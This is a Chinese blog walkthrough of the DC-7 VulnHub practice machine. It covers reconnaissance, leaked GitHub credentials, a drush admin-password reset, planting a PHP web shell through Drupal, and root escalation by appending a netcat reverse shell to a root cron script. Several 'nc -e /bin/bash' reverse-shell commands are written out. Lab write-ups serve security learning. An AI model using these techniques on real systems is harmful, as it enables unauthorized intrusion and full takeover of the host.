DC-7靶场思路详解

于 2025-05-06 22:37:10 发布
阅读量403 收藏 6
点赞数 6
文章标签: web安全 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_87118730/article/details/147749087
版权

老样子,端口扫描,目录扫描,网站指纹

出来端口有80和22端口

目录有个/user/login, 有个登录框

指纹是drupal8

有个登录框,本来要去试一试SQL注入和弱密码爆破,但提示说不用

左下角有个@DC7USER,可能是git泄露 于是去github上查看有没有这玩意

有个config.php配置文件,有个账户密码

于是拿去登录框去试一下,但是失败,前面还有22端口,ssh连接

先查看一下mbox

发现有个定时任务 /opt/scripts/backups.sh

于是去/opt/scripts/上去看看

看到了backups.sh所属root用户 www-data组

再去看看backups.sh的内容(最后一行是后面加的)

有个drush 去查了一下 drush(Drupal Shell)是Drupal的命令行工具

可以改用户密码和添加用户 drush user-passwords admin --passwords=“admin”

改完了密码后再去/user/login去登录,成功进来了

有个add content basic page可以添加内容 可以尝试写入一句话木马

刚开始但是没有php格式 去百度一下,发现drupal8没有php模块 所以还得添加模块

模块下载地址 https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

添加并激活后可以写入一句话木马,并用蚁剑连接

拿到shell后,直接反弹shell到kali上,nc -e /bin/bash ip port

nc -lvvp port

于是创建交互式shell 在提权

这里有个exim4可以去看看能否利用

我用另外一种,结合前面定时任务 backups.sh是属于root的 每隔段时间会执行

于是再往里面加反弹shell命令,这样反弹的shell就有root权限

echo “nc -e /bin/bash kali的ip port” >>backups.sh 这里要用>> 不能用>,>会覆盖内容,>>追加内容

或者在蚁剑中找到backups.sh直接添加

然后再开个终端 开启监听

nc -lvp 6666 等待一会 即可获得root权限

别着急6
关注
渗透测试综合靶场 DC-2 通关详解
goldfish8848的博客
09-18 1532
DC-2与DC-1的渗透步骤有一些相似之处,但也存在一些区别。靶机发现与IP解析DC-2:发现靶机真实IP后,需要修改hosts文件以解析域名到IP地址,因为直接访问IP时域名解析失败。DC-1:没有提到需要修改hosts文件,直接通过IP进行渗透测试。端口探测DC-2:探测到除了常见的80端口外,还有一个7744端口开放。DC-1:主要提到了22和80端口,没有提到7744端口。网站配置与访问DC-2:需要修改hosts文件后才能访问网站,且网站是基于WordPress的。
渗透测试综合靶场 DC-1 通关详解
goldfish8848的博客
09-18 1785
我们收集信息的第一步首先用到了nmap来探测IP和开放端口。nmap(网络映射器)是一款开源的网络扫描和安全审计工具,它可以用来发现网络上的设备,检测开放的端口,确定运行在网络设备上的服务及其版本信息,以及检测潜在的安全漏洞。常用nmap命令:nmap -sn 目标IP地址:快速扫描目标网络,仅用于主机发现,不扫描端口。nmap -sn 目标IP地址/24:扫描整个C类子网。nmap 目标IP地址:扫描目标IP地址上的常见端口。nmap -p 端口号 目标IP地址:扫描特定端口。
DC-1靶场实战详解
a310034188的博客
11-20 1万+
写写自己打DC-1的过程 使用工具 kali DC-1的靶机下载地址为:https://www.vulnhub.com/entry/dc-1,292/ 第一步:环境配置。 我这里的话kali和DC-1都是nat模式 kali IP为:192.168.28.139 DC-1 IP设置为nat模式,具体多少暂时也不知道。 第二步:信息收集 \1. DC-1 IP不知道,那我们首先就先主机存活探测下,看看靶机IP是多少。 为了提高效率,我们直接用nmap,或者arp-scan。 nmap:nmap -sP
DC-2靶场实战详解
热门推荐
a310034188的博客
11-30 1万+
DC-2 写写自己打DC-2的过程 使用工具 kali DC-2的靶机下载地址为:https://www.vulnhub.com/entry/dc-2,311/ 环境配置。 我这里的话kali和DC-2都是nat模式 kali IP为:192.168.28.139 DC-2 IP设置为nat模式,具体多少暂时也不知道。 信息收集 查找 DC-2 IP arp-scan -l 得到DC-2 IP为:192.168.28.179 扫描开启的端口 nmap -A -p1-65535 198.13.51.
DC-1靶场详解
苏生要努力
03-12 3158
DC-1的靶机下载地址为:https://www.vulnhub.com/entry/dc-1,292/
DC-3靶场实战详解
a310034188的博客
01-26 1万+
环境安装 前面安装了老版本的DC-3几次,nmap都扫描不到机器,后来琢磨了很久也找不到问题,然后我去官网重新下载了个就没问题了 官网地址:https://www.vulnhub.com/entry/dc-32,312/ KALI和DC-3都用NAT模式. DC-3需要多修改一些东西 把IDE里面的改成IDE 0:0 都完成后开启KALI与DC-3 寻找FLAG 信息收集 1.首先确认kali与DC-3所在网段 ip add 确认kali与DC-3所在网段为192.168.79.0/2
DC-1靶场渗透过程详解
dengzikan120的博客
12-19 1576
DC-1靶场需要找到官方设计的5个flag,其中涉及信息收集、漏洞查找与利用、getshell、数据库渗透、密码破解、linux提权,
DC-4靶场实战详解
a310034188的博客
02-28 4366
DC-4靶场实战详解
靶场DC-2靶机详解
2401_84693966的博客
09-27 1485
与之前的DC版本一样,这个版本是为初学者设计的,尽管这一次只有一个标志,一个入口点,根本没有线索。Cewl是一款采用Ruby开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件,你可以把字典用到类似John the Ripper这样的密码破解工具中。除此之外,Cewl还提供了命令行工具。看到了,访问不到且发现我们输入的ip地址自动转化为了域名,我们想到dc-2这个域名解析失败,我们需要更改hosts文件,添加一个ip域名指向。
DC-1靶场通关详解
j206923的博客
09-13 1750
在linux中有很多类型的shell,不同的shell具备不同的功能,shell还决定了脚本中函数的语法,Linux中默认的shell是/bash/bash,流行的shell有ash、bash、ksh、csh、zsh等,不同的shell都有自己的特点以及用途。切换语句进入shell,执行whoami查看当前权限,执行ls查看当前目录下文件,切换到root目录,查看文件,发现cat thefinalflag.txt文件。在执行过程中,调用者会暂时获得该文件的所有者权限,且该权限只在程序执行的过程中有效。
DC-1渗透靶场实战速通版
saber的博客
12-01 1117
开启 Kali 和 DC靶机,确保二者互相可以ping通,Kali地址根据命令可以查找到,但是DC靶机我们是没有画面的,只是开启了一个环境,我们可以在虚拟机的设置里面找到。得出新的admin的密码后,又开始重复步骤,登录数据库,使用数据库语句修改指定表指定字段中的值,修改密码为我们123456加密后的值。回到终端,退出数据库,使用命令查看提示文件。
Vulnhub系列之DC7靶场详解
weixin_50053818的博客
05-30 1320
文章目录环境信息收集安装插件拿shell提权 环境 vulhub系列之DC7靶场 VMware虚拟机 kali 信息收集 由目标靶机的MAC地址得到目标IP为192.168.137.103,直接nmap扫描。 可以知道目标开放了80和22端口,直接进入网站。 进入网站发现CMS是drupal 8,在漏洞进行搜索,无果。所以只能查看网站。翻译一下首页的内容。 欢迎来到DC-7 DC-7引入了一些“新”概念,但我将让您弄清楚它们是什么。 ???? 尽管此挑战并不是技术性的全部,但如果您需要诉诸于暴力破
Vulnhub系列之DC1靶场详解
weixin_50053818的博客
05-04 3829
文章目录环境drupal 7.x漏洞拿flag1在目录中找配置文件拿flag2改密码进网站拿flag2ssh爆破拿flag4提权拿最后的flag 环境 DC-1靶场 VMware虚拟机 kali drupal 7.x漏洞拿flag1 首先搭建好靶场。这次一次黑盒靶场测试,只能从虚拟机中查看DC1靶场的mac地址,从而查出目标靶机的IP。 所以目标IP地址为192.168.31.184,直接上nmap进行目标全面扫描。 由nmap扫描可以知道,目标靶机开放了22,80,111,42875端口,看到端
Vulnhub系列之DC2靶场详解
weixin_50053818的博客
05-05 1911
TOC {:toc} 环境 DC-1靶场 VMware虚拟机 kali 直接更改域名解析进网站拿flag1 根据目标靶场的MAC地址得出IP为:192.168.31.182,直接上nmap扫描。 可以发现开放了80端口,网页服务器但是可以看出做了域名解析,所以需要在本地即kali的配置文件/etc/hosts文件写入192.168.31.182 dc-2即可完成本地域名解析。还可以看出网站是由WordPress内容管理系统搭建的。 还开放了7744端口,可以知道使用协议是ssh,所以可以远程连接。 .
2025蓝桥杯省赛网络安全组wp
2301_79035389的博客
04-27 1630
这个也是在赛后才想明白,aes加密用的是十六字节,将前十一个都填成AAAA发过去,因为ecb模式是分组加密,每一组的加密过程都是一样的,所以不需要写脚本还原加密过程去破解(其实硬写也做不到,因为拿不到key,当时我觉得用户名肯定是key,不然解不了,于是就一直卡在这一步了,实际上用户名是明文),直接将发过来的加密数据取出后几组就是admin的加密了。首先是一个按位与,我们都知道,如果gift的结果是1,那说明参与按位与的两个数在对应位置上一定是1.这道题想到思路了,但是忘记dfs怎么写了,脚本没写出来。
IEEE会议:第十届网络安全与信息工程国际会议(ICCSIE 2025)
iaast的博客
04-28 738
2025西部信息工程与技术学术论坛暨第十届网络安全与信息工程国际会议(10th International Conference on Cyber Security and Information Engineering)将于7月23-25日西宁召开。本届会议由北京工业大学、青海理工学院主办,浙江工业大学协办,IEEE计算机学会(IEEE Computer Society)技术赞助。
网络安全之浅析Java反序列化题目
anquan2233的博客
04-30 1582
这段时间做了几道Java反序列化题目,发现很多题目都是类似的,并且可以通过一些非预期gadget打进去,就打算总结一下常见的题目类型以及各种解法,并提炼出一般性的思维方法。多做题,发现这些题目其实都是有规律的,先发现入口点和限制,再根据已知依赖打gadget,本质上还是要多见多积累。
深入理解网络安全中的加密技术
Thanks_ks 的嵌入式代码熔炉:炼出 STM32 到 RTOS 的极致效能!
04-26 1837
本文深入探讨了加密技术在网络安全中的核心作用,从基础概念到高级应用实践,涵盖对称与非对称加密、常见算法解析、密钥管理、数字签名与证书、HTTPS 安全实现及数据库加密策略。文章还讨论了如何防御中间人攻击,并展望了量子计算带来的挑战及其应对策略。强调持续学习和更新知识以应对新兴安全威胁的重要性。
AI Agents 重塑网络安全运维——T-INNOWARE 即将闪耀迪拜 GISEC GLOBAL 2025
最新发布
weixin_43735236的博客
05-03 852
本次展会,T-INNOWARE 将以“AI Agents Redefining Cybersecurity Operations &Maintenance”(AI Agents 重塑网络安全运维)为主题,展示其创新的 Security AI(SAI)和 Network Packet Broker(NPB)解决方案,并受邀参与 OSINT 主题演讲,向全球观众展 现 AI如何重塑安全运维的未来。其产品涵盖安全运维、流量分析、API 安全等领域,以“智能、高效、成本优化”为核心竞争力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值